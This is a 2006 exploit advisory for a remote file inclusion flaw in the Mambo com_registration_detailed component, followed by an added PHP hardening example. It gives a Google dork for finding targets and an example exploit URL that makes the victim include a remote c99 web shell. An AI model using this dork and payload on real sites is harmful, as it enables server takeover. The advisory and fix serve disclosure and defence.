# Title : Mambo com_registration_detailed <= 4.1 Remote File Include
# Published : 2006-09-16
# Author : k1tk4t
########################################################################
# Mambo com_registration_detailed <= 4.1 Remote File Inclusion
#
# Download Source : http://mamboxchange.com/projects/regdetailed/
# Dork = allinur:com_extended_registration
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
########################################################################
file ;
registration_detailed.inc.php
########################################################################
bugs ;
[at]line 25
include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
#########################################################################
example exploit ;
http://victim.xxx/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
########################################################################
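fix ;
The following is an added example, not part of the original advisory and not the component's own code: it shows the two guards that close the include on line 25, a direct-access check and a validated include path. The function name language_include_path, the $allowed list and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added hardening sketch, not the component's code. Names below are hypothetical.
//
// BEFORE (line 25, as quoted in the advisory):
//   include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
// A direct request skips configuration.php, so with register_globals=On the
// request itself sets $mosConfig_absolute_path; a trailing "?" on that value
// turns the rest of the built path into a query string.

// Demo only: in a real install index.php defines this before loading components.
define('_VALID_MOS', 1);

// Guard 1: refuse direct requests to the include file.
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// Guard 2: build the include path from validated parts only.
// Returns the absolute file path, or false if anything looks wrong.
function language_include_path($basePath, $language, array $allowedLanguages)
{
    // No URL schemes or stream wrappers (http://, ftp://, php://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $basePath)) {
        return false;
    }
    // The language must be one of a fixed set, never a free-form string.
    if (!in_array($language, $allowedLanguages, true)) {
        return false;
    }
    // The language directory must exist on the local filesystem.
    $langDir = realpath($basePath . '/components/com_extended_registration/language');
    if ($langDir === false) {
        return false;
    }
    $file = $langDir . DIRECTORY_SEPARATOR . $language . '.inc.php';
    return is_file($file) ? $file : false;
}

// Constructed demo tree standing in for a Mambo install.
$root = sys_get_temp_dir() . '/mambo_demo_' . getmypid();
$dir  = $root . '/components/com_extended_registration/language';
mkdir($dir, 0700, true);
file_put_contents($dir . '/english.inc.php', "<?php\n");
$allowed = array('english');

var_dump(language_include_path($root, 'english', $allowed));                          // local path
var_dump(language_include_path('http://remote.example/x.txt?', 'english', $allowed)); // remote base
var_dump(language_include_path($root, '../../../configuration', $allowed));           // traversal

unlink($dir . '/english.inc.php'); // leave the temp tree empty
```

Independently of the code change, register_globals = Off in php.ini stops request parameters from becoming global variables, and allow_url_fopen = Off stops include from fetching remote URLs on PHP versions of this era.
########################################################################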
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
--> ghoz, home_edition2001, iFX, and for all (friend's&enemy)
# www.Syue.com [2006-09-16]